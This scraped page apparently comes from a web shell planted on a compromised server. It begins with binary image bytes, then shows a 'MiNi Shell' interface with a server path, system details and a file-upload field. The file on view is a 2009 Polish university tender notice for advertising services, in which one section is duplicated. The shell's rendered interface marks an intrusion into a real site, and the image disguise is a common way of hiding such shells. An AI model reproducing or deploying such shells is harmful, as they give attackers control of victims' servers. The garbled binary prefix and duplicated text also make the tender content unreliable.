JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146225-N-2009.html

<p class="kh_header"><b>Kielce: Usługi reklamowe dla Uczelni.</b><br>
<b>Numer ogłoszenia: 146225 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Humanistyczno-Przyrodniczy Jana Kochanowskiego w Kielcach , ul. Żeromskiego 5, 25-369 Kielce, woj. świętokrzyskie, tel. 041 3497277, faks 041 3497278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi reklamowe dla Uczelni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi reklamowej dla Uczelni w ramach projektu grantPROGRES..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w łącznej kwocie 
1 970,00 zł (słownie złotych: tysiąc dziewięćset siedemdziesiąt 00/100)
Wadium dla poszczególnych części wynosi:
Część I: 360 zł (słownie złotych: trzysta sześćdziesiąt 00/100)                    
Część II: 120 zł (słownie złotych: sto dwadzieścia 00/100)
Część III: 480 zł (słownie złotych: czterysta osiemdziesiąt 00/100)
Część IV: 360 zł (słownie złotych: trzysta sześćdziesiąt 00/100) 
Część V: 360 zł (słownie złotych: trzysta sześćdziesiąt 00/100) 
Część VI: 290 zł (słownie złotych: dwieście dziewięćdziesiąt 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą uczestniczyć Wykonawcy spełniający następujące warunki: 
- posiadają uprawnienia do wykonywania działalności o charakterze odpowiadającym przedmiotowi zamówienia, tzn. prowadzą działalność o charakterze odpowiadającym przedmiotowi zamówienia określonym w niniejszej SIWZ,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia , tzn. w okresie ostatnich 3 lat
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali minimum jedną usługę (na każdą część) o charakterze i wielkości odpowiadającą przedmiotowi niniejszego zamówienia o wartości nie mniejszej niż 15 000 zł 
- dla części I; 5 000 zł - dla części II, 20 000 zł - dla części III, 15 000 zł - dla części IV, 15 000 zł - dla części V, 12 000 zł - dla części VI,              
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tzn. nie zalegają z opłacaniem podatków i opłat na ubezpieczenie społeczne i zdrowotne,
- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 20 000 PLN.  
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 Pzp,
- spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 Pzp. 
Spełnianie w/w warunków oceniane będzie na zasadzie metody spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty muszą być dołączone niżej wymienione dokumenty. 
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem na składanie ofert.
2) Umowa Spółki Cywilnej, jeżeli działalność prowadzona jest w takiej formie.
3) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym    
w art. 24 ust.1 pkt 9 Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Pzp, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5) Zaświadczenie właściwego Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6) Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia usług (minimum jedna na każdą część) porównywalnych z przedmiotem zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, dat wykonania i odbiorców oraz dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. W przypadku składania oferty na część zamówienia wykaz powinien odnosić się do tej części, której oferta dotyczy o wartości nie mniejszej niż 15 000 zł - dla części I; 5 000 zł - dla części II, 20 000 zł - dla części III, 15 000 zł - dla części IV, 15 000 zł - dla części V, 12 000 zł - dla części VI  
7) Oświadczenie zgodne z art. 22 ust. 1 Pzp (załącznik Nr 2).
8) Dowód wpłaty wadium.
9) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę minimum 20 000,00 zł.
10) Oświadczenie o zapoznaniu się z treścią Specyfikacji Istotnych Warunków Zamówienia  i projektem umowy.
11) Szczegółowy opis przedmiotu zamówienia wg załącznika Nr 4, ze szczególnym uwzględnieniem technik wykonania i materiałów, z jakich będą wykonane billboardy (dotyczy zestawu III), a w przypadku złożenia oferty na zestaw I i II - opis portalu z uwzględnieniem jego oglądalności, liczby odsłon i możliwością zakładania bezpłatnych kont pocztowych)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ujk.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Humanistyczno - Przyrodniczy Jana Kochanowskiego w Kielcach 
ul. Żeromskiego 5, pokój 21 
25-369 Kielce.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 11:00, miejsce: Uniwersytet Humanistyczno - Przyrodniczy Jana Kochanowskiego w Kielcach 
ul. Żeromskiego 5, pokój 5
25-369 Kielce.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Reklama internetowa..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest reklama internetowa dla Uczelni. 
Specyfikacja techniczna:
- Emisja baneru internetowego w liczbie wyświetleń nie mniej niż 1 000 000 emisji.
- Baner o wymiarze 750x100px. 
- Baner wykonany przez Wykonawcę i poddany akceptacji Uczelni
- Materiały i treści do baneru zostaną przekazane wykonawcy
- Realizacja kampanii minimum 2 tygodnie; maksymalnie 2 miesiące. 
- Datą rozpoczęcia kampanii będzie max. 14 dzień od dnia podpisania umowy.
- Zasięg: województwa: świętokrzyskie, małopolskie, podkarpackie, lubelskie oraz na stronie głównej portalu.

Wymagania portalu:
- Status ogólnopolskiego portalu
- Oglądalność miesięczna nie mniejsza niż 9 mln polskich użytkowników
- Liczba odsłon nie mniejsza niż 3 miliardy
- Portal ma możliwość zakładania bezpłatnych kont pocztowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi internetowe..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi internetowe. 
Specyfikacja techniczna:
- Mailing do osób posiadających bezpłatne konta pocztowego w ogólnopolskim portalu internetowym
- Datą rozpoczęcia będzie max. 14 dzień od dnia podpisania umowy.
- Treść mailingu będzie przedstawiona wykonawcy po podpisaniu umowy
- Możliwość umieszczenie plików graficznych w wysyłanych wiadomościach
- Zasięg: użytkownicy z województwa świętokrzyskiego
- Liczba w/w użytkowników nie mniejsza niż 20 tys. 

Wymagania portalu:
- Status ogólnopolskiego portalu
- Oglądalność miesięczna nie mniejsza niż 9 mln polskich użytkowników
- Liczba odsłon nie mniejsza niż 3 miliardy miesięcznie
- Portal ma możliwość zakładania bezpłatnych kont pocztowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Reklama wielkoformatowa - billboard..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie reklamy wielkoformatowej - billboard.
 Przedmiot zamówienia:
Wykonanie druków wielkoformatowych dla nośnika typu billboard wraz z najmem powierzchni reklamowych dla druków wielkoformatowych, ich rozmieszczenie na tych powierzchniach, ekspozycja, montaż oraz kontrola stanu technicznego, jakości i estetyki druków wielkoformatowych;
Wykonawca ma za zadanie zlokalizować już istniejące nośniki - billboardy, podpisać umowy najmu i wykleić wydrukowaną grafikę;
Do obowiązków Wykonawcy, oprócz wykonania, zawieszenia, zamontowania, podpisania umów najmu tam gdzie będzie to konieczne, będzie należał również demontaż w/w reklam;
Zamawiający ma projekty reklam. Przekaże je Wykonawcy wybranemu do realizacji zamówienia w wersji elektronicznej.
Specyfikacja techniczna:
Ilość miesięcy najmu: 2 
Data rozpoczęcia najmu: max. 14 dni od dnia podpisania umowy
Wymiar: 6.0x3.0m. lub 5.04x2.38m. 
Kolorystyka: pełny kolor (4+0)
Papier: blue-back, gramatura - minimum 115 g/m2 

Lokalizacja umieszczenia reklam

Lokalizacja, trasa
Kielce
Ostrowiec Świętokrzyski
Busko-Zdrój
Radom
Tomaszów Mazowiecki
Jędrzejów
Bełchatów
Sandomierz
Częstochowa
Stalowa Wola
Tarnów
Kazimierza Wielka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Reklama w prasie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi reklamy w prasie.
Specyfikacja techniczna:
- Reklama zamieszczona w 2 niezależnych gazetach
- Druk reklamy w pełnym kolorze
- Rozmiar: cała strona A3 lub ? strony A3 (przy założeniu że ilość emisji reklamy się zwiększy)
- Ilość emisji: format A3 - minimum 2 emisje, format ? A3 - minimum 4 emisje. Emisje reklamy w odstępach nie mniejszych niż 3 wydania.
- Datą rozpoczęcia będzie max. 14 dzień od dnia podpisania umowy.
- Reklama do wykonania przez Wykonawcę , będzie wymagała akceptacji Uczelni, materiały zostaną przekazanie po zakończeniu przetargu.

Wymagania dla gazety:
- Gazeta codzienna (wydawana od poniedziałku do soboty)
- Zasięg: województwa ościenne woj. Świętokrzyskiego (podkarpackie, łódzkie, mazowieckie, małopolskie )
- Nakład: min. 30 000 egzemplarzy
- Format: A3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Reklama w radio.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa reklamy w radio.

Specyfikacja techniczna:
- Reklama w 3 niezależnych rozgłośniach radiowych
- Datą rozpoczęcia będzie max. 14 dzień od dnia podpisania umowy.
- Czas emisji reklamy około 1 miesiąc, średnio 7 spotów dziennie,
- Program spotów i ich częstotliwości będzie ustalony po zakończeniu,
- Ilość spotów na każdą z 3 rozgłośni: minimum 200 spotów 
- Łączna ilość spotów reklamowych w trzech rozgłośniach radiowych: minimum 600 spotów
- Długość spotu reklamowego: - minimum 30 sekund
- Treść oraz czas emisji reklamy będzie wymagał akceptacji Uczelni.
- Spot do wykonania przez Wykonawcę.

Wymagania dla rozgłośni radiowych:
- Duży zasięg: województwo świętokrzyskie i województwa ościenne (tj. mazowieckie, małopolskie, łódzkie, podkarpackie).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Reklama w autobusach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa reklamy w autobusach. 

Reklama wizualna na środkach komunikacji miejskiej
Reklama na środkach komunikacji miejskiej powinna zawierać :
- reklamę na całej długości autokaru miejskiego, z każdej strony,
- reklama na co najmniej 1 środku komunikacji miejskiej w każdym z wymienionych poniżej miast,
- miasta w których należy umieścić reklamę na środkach komunikacji
miejskiej to: Radom, Kielce, Piotrków, Starachowice.
Czas wynajmu reklamy na autobusach miejskich w każdym z wymienionych miast powinien wynosić co najmniej 2 miesiące.
Projekt i treść reklamy - całość w kolorze do wykonania przez Wykonawcę, materiały do reklam zostaną przekazane Wykonawcy po podpisaniu umowy. 
Reklama będzie wymagała akceptacji Uczelni.
Reklamy  powinny być zamieszczone na środkach komunikacji miejskiej nie
później jak 14 dni od daty podpisania umowy z Wykonawcą wybranym do realizacji umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Reklama w autobusach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa reklamy w autobusach. 

Reklama wizualna na środkach komunikacji miejskiej
Reklama na środkach komunikacji miejskiej powinna zawierać :
- reklamę na całej długości autokaru miejskiego, z każdej strony,
- reklama na co najmniej 1 środku komunikacji miejskiej w każdym z wymienionych poniżej miast,
- miasta w których należy umieścić reklamę na środkach komunikacji
miejskiej to: Radom, Kielce, Piotrków, Starachowice.
Czas wynajmu reklamy na autobusach miejskich w każdym z wymienionych miast powinien wynosić co najmniej 2 miesiące.
Projekt i treść reklamy - całość w kolorze do wykonania przez Wykonawcę, materiały do reklam zostaną przekazane Wykonawcy po podpisaniu umowy. 
Reklama będzie wymagała akceptacji Uczelni.
Reklamy  powinny być zamieszczone na środkach komunikacji miejskiej nie
później jak 14 dni od daty podpisania umowy z Wykonawcą wybranym do realizacji umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com